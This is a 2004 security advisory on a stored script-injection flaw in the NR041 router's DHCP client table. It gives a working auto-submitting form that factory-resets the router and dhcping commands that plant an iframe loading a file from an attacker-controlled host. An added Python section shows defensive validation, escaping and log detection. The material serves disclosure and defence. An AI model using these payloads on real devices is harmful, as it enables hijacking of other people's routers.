[NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org
Date: 2 Sep 2004 12:55:40 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
NetworkEverywhere Router Model NR041 Script Injection via DHCP
<http://www.networkeverywhere.com/products/nr041.asp> The Network
Everywhere NR041 Cable/DSL 4-port router "connects multiple PCs to your
Cable or DSL modem. The router lets your PCs share one IP address from
your ISP, files, printers and other resources. It can also function as a
DHCP server for easy IP assignment".
The DHCP HOSTNAME option supplied by clients is not filtered for malicious
content, so script code can be injected through it and stored on the router.
Vulnerable systems:
* NR041 firmware revision 1.2 release 03
Because the router does not filter out potentially dangerous characters, it
is straightforward to inject script code into the web-based administrative
interface. When the administrator later views the DHCP client table, the
browser executes the stored script inside the administrator's authenticated
session, so the script has the same full access to the router that the
administrator has. One simple attack is to have the script reset the router
to its factory defaults, which also rolls back the administration password.
Because the router's DHCP server is reachable only from the local network,
the flaw is hard to exploit remotely. However, wherever an attacker can
issue DHCP requests to the router, the vulnerability can be exploited.
The NR041 is configured through a web-based administrative interface built
from several CGIs that are invoked with the HTTP POST method. Exploitation is
not entirely easy under these circumstances (the hostname is limited to a 15
character string, and the payload cannot be split at arbitrary points), but a
trick known from the exploitation of the D-Link DI-614+ can be used to work
around this.
* Step 1:
Because there is not enough room to carry out the complete attack in one
hostname, a different approach is used: inject the code for an IFRAME that
forces the browser to load a remote HTML file, e.g. "a.htm", from a site
under the attacker's control. That file contains a form that auto-submits
itself when loaded. The code for such an HTML file is shown below. Note that
because of the length limitation the filename should be as short as
possible:
<html><head></head>
<body onload="document.xx.submit()">
<form name=xx method=post action="http://192.168.1.1/passwd.cgi">
<input type=hidden name=FactoryDefaults value="Enable">
</form>
</body></html>
The attack carried out by this HTML file is a POST to passwd.cgi with the
FactoryDefaults option set to "Enable". Note that the router's IP address is
hard-coded in this file, but it could equally be taken from the HTTP Referer
header, which would make the script work without any adjustment.
* Step 2:
Inject the script containing the IFRAME using dhcping, like so:
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123 -opthostname "<iframe id=' " -m af:af:af:af:af:ad
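The root cause described above is a missing input check on the client-supplied hostname combined with a missing output encoding step when the DHCP client table is rendered; the three dhcping commands show how the payload is split across hostnames to stay under the 15-character limit. The following Python is an added example, not code from the advisory or from the router vendor, showing the two fixes a firmware author would apply (RFC 1123 hostname validation at intake, HTML escaping at render time) and a log check a network operator could run to spot hostnames like these. The 15-character cap and the dhcpd-style log format are assumptions; the log lines are constructed and reuse the hostname fragments from the commands above.

```python
import html
import re

# Assumed rules (not taken from the NR041 firmware): RFC 1123 hostname labels
# (letters, digits, hyphens, no leading or trailing hyphen) and the
# 15-character cap the advisory says the router imposes on the stored name.
MAX_HOSTNAME_LEN = 15
_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

# Assumed log format, modelled on ISC dhcpd's "DHCPxxx from <mac> (<hostname>) via <if>"
# lines; the hostname is whatever sits between the parentheses.
_LOG_RE = re.compile(
    r"^DHCP[A-Z]+ (?:for \S+ )?from ([0-9a-f]{2}(?::[0-9a-f]{2}){5}) \((.*)\) via \S+$")


def is_valid_hostname(name: str, max_len: int = MAX_HOSTNAME_LEN) -> bool:
    """Intake check: accept only RFC 1123 style names of at most max_len characters.

    Anything containing quotes, slashes, angle brackets or spaces, such as the
    fragments used in the advisory, fails this test and should not be stored."""
    if not name or len(name) > max_len:
        return False
    return all(_LABEL_RE.match(label) for label in name.split("."))


def render_client_row(ip: str, mac: str, hostname: str) -> str:
    """Output encoding: build one HTML row of the DHCP client table.

    Every field is escaped, quotes included, so a stored hostname is shown as
    text and can never be interpreted as markup, even if intake validation
    was somehow bypassed."""
    cells = (html.escape(ip, quote=True),
             html.escape(mac, quote=True),
             html.escape(hostname, quote=True))
    return "<tr>" + "".join("<td>%s</td>" % c for c in cells) + "</tr>"


def suspicious_hostnames(log_text: str) -> list:
    """Detection: return (mac, hostname) pairs from DHCP log lines whose
    client-supplied hostname fails the validation rule."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if m and not is_valid_hostname(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed sample log (not real router output). The first three hostnames
# are the fragments from the advisory's dhcping commands; the last is benign.
SAMPLE_LOG = """\
DHCPDISCOVER from af:af:af:af:af:ad (<iframe id=' ) via eth0
DHCPDISCOVER from af:af:af:af:af:ae ('src='//url.ca/) via eth0
DHCPDISCOVER from af:af:af:af:af:af (/../a.htm' > ) via eth0
DHCPREQUEST for 192.168.1.50 from 00:11:22:33:44:55 (desktop-01) via eth0
"""

if __name__ == "__main__":
    for mac, name in suspicious_hostnames(SAMPLE_LOG):
        print("rejected hostname from %s: %r" % (mac, name))
    # Even if such a name reached the table, escaping renders it harmless.
    print(render_client_row("192.168.1.123", "af:af:af:af:af:ad", "<iframe id=' "))
```

Validation and escaping are deliberately separate functions: the first belongs in the DHCP server where the option is parsed, the second in the CGI that writes the client table, and either one alone would have prevented the stored script from executing in the administrator's session.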
The information has been provided by <mailto:Daemonz@videotron.ca>
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.